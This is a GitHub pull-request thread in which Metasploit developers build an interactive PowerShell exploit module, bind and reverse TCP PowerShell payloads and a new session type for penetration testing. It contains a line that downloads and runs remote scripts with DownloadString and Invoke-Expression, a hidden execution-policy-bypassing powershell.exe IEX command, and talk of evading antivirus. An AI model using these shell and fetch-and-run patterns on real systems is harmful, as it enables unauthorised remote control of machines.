Interactive PowerShell Post Module #5194

Merged
merged 44 commits into from Apr 27, 2015

10 participants
@benpturner
Contributor

benpturner commented Apr 19, 2015

Interactive PowerShell prompt from a compromised session. It opens a TCP
listener for PowerShell and automatically creates the handler. You can
also pass it other PowerShell files in the LOAD_MODULE option to go
ahead and download using the download cradle once the session is
established.

@Meatballs1 Meatballs1 self-assigned this Apr 19, 2015

Contributor

Meatballs1 commented Apr 19, 2015

I have made some changes in https://github.com/benpturner/metasploit-framework/pull/1. If you could test them out that would be great!

  • Placed the powershell script into a real file
  • Converted it into an exploit module.
  • Instead of using the windows/shell_bind_tcp payload have added a cmd/windows/interact payload which lets you pass it an already established socket (cmd/unix/interact is used for shells gained over SSH for example).
  • I have changed the way powershell is executed, this means the process will close after the connection closes. This also closes down the socket so you can re-execute the module after exiting it.
  • Used the Msf::Post::Windows::Powershell mixin to perform the compression etc.
Contributor

Meatballs1 commented Apr 19, 2015

Example run:

msf exploit(interactive_powershell) > run

[*] Loading 1 modules into the interactive PowerShell session
[+]  https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Recon/Get-ComputerDetails.ps1
[*] Started PowerShell on BEN-TEST - PID: 3932
[*] Attempting to connect to 192.168.153.133:4444...
[*] Found shell.
[*] Command shell session 26 opened (192.168.153.143:55331 -> 192.168.153.133:4444) at 2015-04-19 23:37:43 +0100

Find-4624Logons

Name                           Value                                           
----                           -----                                           
                               @{LogSource=Security; Count=1; SourceAccountN...


PS C:\Users\admin> pwd

Path                                                                           
----                                                                           
C:\Users\admin                                                                 


PS C:\Users\admin> exit

[*] 192.168.153.133 - Command shell session 26 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(interactive_powershell) >
Contributor

hdm commented Apr 19, 2015

This should probably be a new session type, since PS isn't compatible with command shells.

Contributor

sempervictus commented Apr 20, 2015

Well played sir (or ma'am).
@Meatballs1 or @benpturner could you clean out the encoding and other scaffold components, and pull the actual PSH into a template so we can sub/mod it on the fly? We have library routines to deal with the deflation and such (I actually just saw code land in master missing the EOFs again, which might cause problems for injected code like this), and it allows for the creation of more dynamic results since we can mix and match encoding and compression algos to screw with defenses.

I'm with @hmoore-r7 on the session type; when I was playing with the PSH shells from SET the reuse of standard shell sessions gave me some trouble so I had to create a new session type. Might even have the code somewhere if needed.

Thanks to all who are working on this.

Contributor

benpturner commented Apr 20, 2015

@Meatballs1, I have tested your changes and am 100% happy with them. Works better as an exploit module and now exits smoothly and can be restarted again. Do I have to do anything else to submit this for master?

Contributor

hdm commented Apr 20, 2015

@benpturner re: master, this kind of breaks the metasploit model, and we should look at a refactor that makes PowerShell a first-class session type (and add the related payloads, etc). Happy to help with this effort, but I don't believe we could accept this change today due to the conflict with the model (it creates a shell session that is incompatible with post modules).

cc @jlee-r7 @trosen-r7

Contributor

hdm commented Apr 20, 2015

Also of note is that this fails the msftidy check:

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/msftidy.rb ---
modules/exploits/windows/local/interactive_powershell.rb:91 - [ERROR] fail_with requires a valid Failure:: reason as first parameter: fail_with(Exploit::Failure::Unknown, 'Failed to start powershell process') unless res && res.pid 
modules/exploits/windows/local/interactive_powershell.rb:128 - [ERROR] fail_with requires a valid Failure:: reason as first parameter: fail_with(Exploit::Failure::Unknown, "Unable to connect") 
modules/payloads/singles/cmd/windows/interact.rb - msftidy check passed
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
The command "./.git/hooks/post-merge" failed and exited with 16 during .
Contributor

Meatballs1 commented Apr 20, 2015

Gah I'm sure I have it hooked, but I think @FireFart added that recently :)

I think I am supplying a longer namespace declaration for Exploit::Failure::x rather than Failure::x which the regex rejects.

Contributor

Meatballs1 commented Apr 20, 2015

@sempervictus Do your comments apply to the new structure? PS: if you can point out the EOF bits that are missing, I can work to get them tidied up. Also need to work on refactoring the Post::Windows::Powershell module to use the Rex::Powershell libraries now.

Contributor

FireFart commented Apr 20, 2015

Yeah I only added Failure::x to msftidy. According to https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit.rb#L1224 the reason has to be an Msf::Module::Failure: Does an Exploit::Failure even exist?

Contributor

Meatballs1 commented Apr 20, 2015

I think they got moved from Exploit to Module at some point. Will fix up with next iterations/better powershell structure.

Contributor

benpturner commented Apr 20, 2015

@hmoore-r7 Very happy for you to help with this.

Contributor

void-in commented Apr 20, 2015

@benpturner The rspec issue is easy to resolve, as @Meatballs1 mentioned as well. All you need to do is replace Exploit::Failure::Unknown with Failure::Unknown in the fail_with statements. Everything should be fine then.

Contributor

benpturner commented Apr 20, 2015

Updated that issue

Contributor

davehardy20 commented Apr 20, 2015

I just made that change too, Ben, and tested the module and it works fine.

Contributor

benpturner commented Apr 20, 2015

@davehardy20 cheers

Contributor

hdm commented Apr 20, 2015

The build is failing with

Untested payload detected.  Running `tools/missing_payload_tests.rb` to see contexts to add to `spec/modules/payloads_spec.rb` to test those payload ancestor reference names.
Add the following context to `spec/modules/payloads_spec.rb` by inserting them in lexical order between the pre-existing contexts:
  context 'cmd/windows/interact' do
    it_should_behave_like 'payload cached size is consistent',
                          ancestor_reference_names: [
                            'singles/cmd/windows/interact'
                          ],
                          dynamic_size: false,
                          modules_pathname: modules_pathname,
                          reference_name: 'cmd/windows/interact'
  end

It's probably worth ignoring this until we refactor this as a new session type, though.

Contributor

hdm commented Apr 20, 2015

@benpturner Should I PR to your PR, or create a fresh PR to replace this?

Contributor

benpturner commented Apr 20, 2015

Up to you, whichever you think. It would be good to get this in, then work on creating a new session with its own payloads just for PowerShell. Happy to help with all this too.

Contributor

benpturner commented Apr 20, 2015

Should be able to create a reverse_tcp payload option as well.

Contributor

benpturner commented Apr 21, 2015

@hmoore-r7 what should we do here?

Contributor

hdm commented Apr 21, 2015

Are you comfortable implementing a new session type and building out the individual payloads?

Contributor

benpturner commented Apr 21, 2015

@hmoore-r7 I wouldn't say comfortable, but I'm happy to have a go and learn. Do you mean creating a new session, e.g. /lib/msf/base/sessions/*? If there is any way you can help or point me in the right direction then I'm happy to help. I have created some reverse_tcp, bind_tcp PowerShell options and even UDP options, just not sure how to go about the session type.

Contributor

hdm commented Apr 21, 2015

Got it - I can PR to your branch for the arch & session type support, should make more sense from there. If you want to start on payloads, it may take me a day or two to get to this.

Contributor

benpturner commented Apr 21, 2015

OK, sounds like a plan.

Contributor

benpturner commented Apr 22, 2015

@hmoore-r7 I was testing a payload module (windows/powershell_bind_tcp) I created for this and found that, while this is going to be a cool addition, it got caught by AV when using it with PSEXEC. I think it will still be a good idea to have the interactive_powershell local exploit, to obtain a PowerShell that way. What do you think? Also, could you maybe explain your thoughts around the new session: will it allow post modules to be run against it etc.? Like a post/powershell/invoke-dump-users for example?

Contributor

hdm commented Apr 22, 2015

No problem with adding an interactive version as well, it just breaks things today unless we create a new session type for it.

Contributor

hdm commented Apr 22, 2015

By interactive, do you mean just making a bind_tcp and running it locally? Curious how AV caught powershell (assuming it was delivered via command-line and not an EXE wrapper of any sort).

Contributor

benpturner commented Apr 22, 2015

When I say interactive, this is just what the module was changed to; basically it was a post module that takes a PowerShell script and creates a bind_powershell session using the shell.exec API in Windows. I think it was the psexec part of the script that got caught, not necessarily the PowerShell script; it was just a way to execute it. I created a payload module that could be added to the psexec module.

Contributor

benpturner commented Apr 22, 2015

@hmoore-r7 I've uploaded some of the payload modules I've been working on; here is a bind_tcp and reverse_tcp PowerShell payload. This can be used with msfvenom and a valid exploit, e.g. psexec or similar.

Contributor

benpturner commented Apr 26, 2015

Just re-added the ARCH_X86 payloads and the payload_inject module works well with them now. Is it worth keeping the ARCH_CMD payloads anyway, as you can still get the raw payload? I think these could come in handy. Should I now remove my module interactive_powershell?

Contributor

hdm commented Apr 26, 2015

No need for interactive_powershell anymore, thanks!

Contributor

benpturner commented Apr 26, 2015

Just pushed all the above updates bar the session info. If the class is "Msf::Sessions::PowerShell < Msf::Sessions::CommandShell", how can I overwrite the "self.info = initial_output"?

What function do I add to the powershell.rb session type?

Contributor

hdm commented Apr 26, 2015

In your powershell base class, add the following method:

  #
  # Execute any specified auto-run scripts for this session
  #
  def process_autoruns(datastore)
    # Read the initial output (PS banner) and toss it
    initial_output = shell_read(-1, 0.01)
    # TODO: send command for getting the username
    # TODO: parse out the username and set it to a variable
    # TODO: send command for getting the hostname
    # TODO: parse out the hostname and set it to a variable
    # Set the session info
    self.info = "#{username} @ #{hostname}"
    # Call our parent class's autoruns processing method
    super
  end
Review comment on data/exploits/powershell/powerfun.ps1 (outdated diff):
(Get-Webclient).DownloadString($module)|Invoke-Expression
}
}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")

@hdm

hdm Apr 26, 2015

Contributor

It may be worth adding code to get the username and hostname here for easy access in the session initializer (process_autoruns). For example:

$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user @username on @hostname`n")

@benpturner

benpturner Apr 26, 2015

Contributor

Yeah, good idea, was just thinking the exact same thing...


Contributor

benpturner commented Apr 26, 2015

@hmoore-r7 Tried this and it seems to hang and not drop into the powershell session?

Contributor

benpturner commented Apr 26, 2015

@hmoore-r7 I've now added the username and host to the first line of the session. Do you know the regex for only getting the first line before a newline character? This would then only show the username.

Contributor

benpturner commented Apr 26, 2015

Are there any other errors before you are able to merge this?

Contributor

hdm commented Apr 26, 2015

The hostname/username in the session info and the sessions -u issue seem to be the only blockers. Once the functional stuff is sorted out I can do a cosmetic pass.

Contributor

benpturner commented Apr 26, 2015

I've added the hostname/username to the start of the powershell command so this is processed into the session information. In terms of the functional stuff, is there anything you want me to do?

Contributor

hdm commented Apr 26, 2015

We should address the sessions -u problem (it runs shell_to_meterpreter, but this module doesn't work with the powershell session). Can you push your changes to review?

Contributor

benpturner commented Apr 26, 2015

I think I removed the option for PowerShell in the sessions -u. I have pushed all my latest changes; have you not got them?

Contributor

hdm commented Apr 26, 2015

Looks like these didn't get pushed to your branch (not showing here).

Review comment on lib/msf/ui/console/command_dispatcher/core.rb (outdated diff):
@@ -1775,6 +1775,9 @@ def cmd_sessions(*args)
elsif session.type == 'shell'
output = session.shell_command(cmd)
print_line(output) if output
elsif session.type == 'powershell'
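Review bot: the new `elsif session.type == 'powershell'` branch in cmd_sessions is still present although the thread agreed to drop the PowerShell option from `sessions -u` (shell_to_meterpreter does not work with the PowerShell session), so it should be removed rather than left as a third branch; its body is cut off in this view, and if it only repeats the `shell` branch (`output = session.shell_command(cmd)` / `print_line(output) if output`) and does need to stay for the `-c` path, the two types belong in one condition instead of three duplicated lines.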

@hdm

hdm Apr 26, 2015

Contributor

Still listed


Contributor

benpturner commented Apr 26, 2015

Ahhh, yeah you're right sorry. I've removed this now. Changes should all be in the request now

@hdm

hdm Apr 26, 2015

Contributor

Some leftover issues:

+      'PayloadType'   => 'cmd_interact',

These should be removed from the CMD payloads. I'll do a final cosmetic pass on the rest before merging.

@benpturner

benpturner Apr 26, 2015

Contributor

Should it be just cmd now?

@hdm

hdm Apr 26, 2015

Contributor

The #TODO: items weren't optional either. You could replace these with something like:

if output_line =~ /running as user ([^\s]+) on ([^\s]+)/
  username = $1
  hostname = $2
end
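The regex hdm suggests above, carried through as an added example rather than code from this PR or from Metasploit itself: it scans the raw output the remote PowerShell process sends on connect for the "running as user X on Y" banner, returns the pair (or nil when the banner is absent, which is the case the #TODO left unhandled), and formats the "user @ host" string that the Information column of `sessions -l` shows further down. The banner wording is taken from the regex in the comment; the helper names and the sample output are constructed for illustration.

```ruby
# Added example, not code from the PR. Parses the connect banner of the
# interactive PowerShell session into username/hostname the way the
# comment above suggests, with a nil result instead of blank fields when
# no banner line is present. Helper names are hypothetical.

BANNER_RE = /running as user ([^\s]+) on ([^\s]+)/

# Scan raw session output line by line for the banner.
# Returns [username, hostname] or nil when no line matches.
def parse_powershell_banner(output)
  output.each_line do |line|
    m = BANNER_RE.match(line)
    return [m[1], m[2]] if m
  end
  nil
end

# Build the value for the Information column of `sessions -l`.
# A nil parse yields a generic label rather than a malformed " @ " string.
def session_info(parsed)
  return 'PowerShell session (unknown user)' if parsed.nil?
  username, hostname = parsed
  "#{username} @ #{hostname}"
end

# Constructed sample: the banner surrounded by other console output that
# the remote process might emit before its first prompt.
SAMPLE_OUTPUT = <<~OUT
  Windows PowerShell
  running as user Developer on BEHEMOTH
  PS C:\\Users\\Developer>
OUT

# Constructed sample with a domain-qualified user; the whole DOMAIN\user
# token is kept because backslash is not whitespace for [^\s]+.
SAMPLE_DOMAIN_OUTPUT = "running as user CORP\\svc_build on BUILD01\r\n"

# Constructed sample with no banner at all (e.g. the script was edited and
# the line that prints it was dropped): the parser must return nil.
SAMPLE_NO_BANNER = "PS C:\\> \r\n"

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_OUTPUT, SAMPLE_DOMAIN_OUTPUT, SAMPLE_NO_BANNER].each do |out|
    puts session_info(parse_powershell_banner(out))
  end
end
```

Matching with `BANNER_RE.match` instead of `=~` avoids relying on `$1`/`$2` surviving across the block boundary of `each_line`, and returning nil forces the caller to decide what to display rather than silently registering a session with empty user and host fields.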
@hdm

hdm Apr 26, 2015

Contributor

@benpturner You can just omit the PayloadType lines entirely from the CMD payloads

@benpturner

benpturner Apr 26, 2015

Contributor

@hmoore-r7 Those changes are both applied now. I just want to say thanks a lot for all your help on this....

@hdm

hdm Apr 26, 2015

Contributor

@benpturner Thank you for contributing to Metasploit, sorry this PR took the long road =)

@Meatballs1 Thanks for getting the review rolling!

I'll finish the review here, tweak any minor & cosmetic things, and merge in a bit after testing.

@benpturner

benpturner Apr 26, 2015

Contributor

Sweet, cheers @hmoore-r7 and @Meatballs1........

@hdm

hdm Apr 26, 2015

Contributor

Looks good:

msf exploit(handler) > [*] Starting the payload handler...
[*] Powershell session session 1 opened (192.168.0.3:60013 -> 192.168.254.103:4444) at 2015-04-26 16:00:27 -0500

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type         Information           Connection
  --  ----         -----------           ----------
  1   powershell   Developer @ BEHEMOTH  192.168.0.3:60013 -> 192.168.254.103:4444 (192.168.254.103)

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[-] Session 1 is not a command shell session, skipping...

hdm pushed a commit to hdm/metasploit-framework that referenced this pull request Apr 26, 2015

@hdm

hdm Apr 26, 2015

Contributor

Future work would include moving to SSL for connections, supporting native Meterpreter injection via PowerShell scripts, and moving the payload logic into a shared mixin to avoid duplicate code.

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

Phew, good work guys.

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

P.S. @hmoore-r7 you do realise you 'landed' it to your own fork and not rapid7, right? Assume you are still tweaking...

script_in.gsub!('LHOST_REPLACE', lhost.to_s)
script = Rex::Powershell::Command.compress_script(script_in)
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

N.B. the Rex::Powershell modules also have the command line generation written up in generate_psh_command_line. This allows hash options to be used to generate the arguments etc.

@hdm

hdm Apr 27, 2015

Contributor

@Meatballs1 Thanks for catching that!

@hdm hdm merged commit 82fe480 into rapid7:master Apr 27, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

@benpturner benpturner deleted the benpturner:powershell branch Apr 27, 2015

],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

Is this correct, btw?


@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

Not ARCH_CMD?

@hdm

hdm Apr 27, 2015

Contributor

Correct, two sets of payloads: one which is ARCH_CMD, another which uses the windows/exec payload as a base and is ARCH_X86 (allows for EXE generation, silly, but helps with some use cases).

@watson40

watson40 Aug 13, 2018

Can I get the software please?
